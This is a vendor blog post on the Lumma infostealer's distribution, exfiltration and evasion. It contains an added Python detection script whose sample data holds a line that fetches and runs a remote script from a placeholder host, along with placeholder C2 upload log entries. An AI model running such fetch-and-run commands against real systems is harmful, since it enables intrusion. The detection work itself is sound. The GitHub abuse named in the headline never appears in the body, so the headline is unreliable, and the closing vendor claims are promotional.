Large-Scale Lumma Infostealer Campaign Abuses GitHub for Malware

Alan V Gutnov

Director of Strategy

July 19, 2025 | 2 min read

The Rise of Lumma Info Stealer

Figure: Lumma Info Stealer

The Malware-as-a-Service (MaaS) model gives cybercriminals access to sophisticated, ready-made tooling for executing cyber attacks. One notable example is the Lumma info stealer, operational since 2022, which targets sensitive data such as login credentials and banking information. The malware is sold on dark web forums, and its visibility has grown as more of its command-and-control (C2) servers have been identified.

Lumma Info Stealer Background

Lumma, also known as LummaC2, is marketed to threat actors through tiered subscription models, making it affordable even for novice attackers. Priced from USD 250, it has gained traction in marketplaces alongside other info stealers such as Vidar and Raccoon. The malware primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, indicating a focus on high-value data.

Attack Vectors and Distribution Methods

Lumma has been distributed through various deceptive methods, including masquerading as popular software like VLC or ChatGPT. Attackers also exploit phishing emails, often impersonating legitimate companies such as Bandai Namco to lure victims into executing malicious payloads. The malware targets Windows operating systems and multiple browsers, including Chrome and Firefox, to exfiltrate sensitive information.

Figure: Malicious email example

Data Exfiltration Techniques

Once Lumma executes successfully, it uses HTTP POST requests to transmit stolen data to its C2 servers. Darktrace observed multiple infected devices communicating with known Lumma C2 infrastructure, revealing a consistent pattern of data exfiltration. The malware can access and steal browser data, cookies, and sensitive information from applications such as AnyDesk and KeePass.

Figure: Device event log

Evasion Techniques and Defense Recommendations

Lumma employs several evasion techniques to avoid detection by security tooling, including obfuscation and encryption to mask its payloads and the use of trusted, signed Windows binaries such as mshta.exe and wscript.exe to execute malicious code so that the activity blends in with legitimate processes. Organizations are urged to adopt advanced security measures, such as Gopher Security's AI-Powered Zero Trust Platform, to strengthen their defenses against evolving threats like Lumma.
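The two behaviours described above (HTTP POST exfiltration to C2 servers in the data-exfiltration section, and the abuse of mshta.exe and wscript.exe here) are both observable in ordinary telemetry. The script below is an added example written for this page; it is not code from Gopher Security, Darktrace, or the Lumma operators. It runs two simple detections over constructed sample data: one over Windows process-creation events (Sysmon Event ID 1 style field names are assumed), flagging script hosts that pull a remote resource or are spawned by a user-facing application, and one over proxy log lines in an assumed `timestamp src METHOD url status bytes_out` layout, flagging POSTs to a known-C2 host or unusually large POSTs to hosts outside an allowlist. The host names, parent-process list, and byte threshold are illustrative assumptions, not indicators from the article.

```python
"""Detection sketch for the two Lumma behaviours described on this page:
LOLBin execution (mshta.exe / wscript.exe) and HTTP POST exfiltration.

Added example, not Gopher Security's or Darktrace's code. The log
formats, host names, parent list and threshold below are constructed.
"""
import re
from collections import defaultdict

# Assumption: the trusted Windows binaries the text names as abused launchers.
LOLBINS = {"mshta.exe", "wscript.exe"}
# Assumption: parents from which a script-host launch is suspicious
# (document readers, mail clients, browsers).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "chrome.exe", "firefox.exe"}
# A URL or a UNC path on the command line means the script host is
# fetching its payload from somewhere other than a local file.
REMOTE_ARG = re.compile(r"https?://|\\\\", re.IGNORECASE)


def flag_process_events(events):
    """Return (image, reason, command_line) for process-creation events whose
    image is mshta.exe or wscript.exe and that either reference a remote
    resource on the command line or are launched by a user-facing app."""
    hits = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image not in LOLBINS:
            continue
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "")
        if REMOTE_ARG.search(cmd):
            hits.append((image, "remote resource on command line", cmd))
        elif parent in SUSPICIOUS_PARENTS:
            hits.append((image, f"launched by {parent}", cmd))
    return hits


# Assumed proxy log layout: timestamp src METHOD url status bytes_out
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<bytes_out>\d+)$"
)


def flag_post_exfil(lines, known_c2, allow_hosts, byte_threshold=4096):
    """Return {src: [reasons]} for sources that POST to a known-C2 host or
    send a POST body of at least byte_threshold bytes to a non-allowlisted host."""
    findings = defaultdict(list)
    for line in lines:
        m = PROXY_LINE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        host = re.sub(r"^https?://", "", m["url"]).split("/", 1)[0]
        host = host.split(":")[0].lower()  # drop any explicit port
        sent = int(m["bytes_out"])
        if host in known_c2:
            findings[m["src"]].append(f"POST to known C2 host {host}")
        elif host not in allow_hosts and sent >= byte_threshold:
            findings[m["src"]].append(f"large POST ({sent} bytes) to {host}")
    return dict(findings)


# Constructed sample process-creation events (Sysmon EID 1 style fields).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\inv.hta"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wscript.exe //B http://example.invalid/loader.js"},
    {"Image": r"C:\Windows\System32\wscript.exe",          # benign admin script
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"wscript.exe C:\ProgramData\maint\cleanup.vbs"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# Constructed proxy log lines; .invalid hosts are placeholders, not real IoCs.
SAMPLE_PROXY = [
    "2025-07-19T10:00:01Z 10.0.0.12 GET https://update.example.invalid/ping 200 120",
    "2025-07-19T10:00:05Z 10.0.0.12 POST https://c2-placeholder.invalid/api 200 65536",
    "2025-07-19T10:00:09Z 10.0.0.12 POST https://unknown-host.invalid:8443/upload 200 81920",
    "2025-07-19T10:01:00Z 10.0.0.44 POST https://mail.example.invalid/send 200 2048",
]
KNOWN_C2 = {"c2-placeholder.invalid"}      # placeholder for a threat-intel feed
ALLOW_HOSTS = {"update.example.invalid", "mail.example.invalid"}

if __name__ == "__main__":
    for hit in flag_process_events(SAMPLE_EVENTS):
        print("process:", hit)
    for src, reasons in flag_post_exfil(SAMPLE_PROXY, KNOWN_C2, ALLOW_HOSTS).items():
        print("network:", src, reasons)
```

The process rule flags the Word-spawned mshta.exe and the wscript.exe fetching a script over HTTP but leaves the svchost-spawned maintenance script alone, and the network rule surfaces a single workstation with both a POST to a listed C2 host and a large upload to an unknown host. In a real deployment the known-C2 set would come from a threat-intelligence feed and the allowlist from observed baseline traffic.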

Future Outlook

As cyber threats grow more sophisticated, organizations need to focus on proactive risk-management strategies. Gopher Security offers services such as a Cloud Access Security Broker and an AI Inspection Engine for traffic monitoring to help businesses detect and respond to threats like Lumma effectively.

Explore our services at Gopher Security to safeguard your organization against the rising tide of cyber threats.

Alan V Gutnov

Director of Strategy

MBA-credentialed cybersecurity expert specializing in Post-Quantum Cybersecurity solutions with proven capability to reduce attack surfaces by 90%.
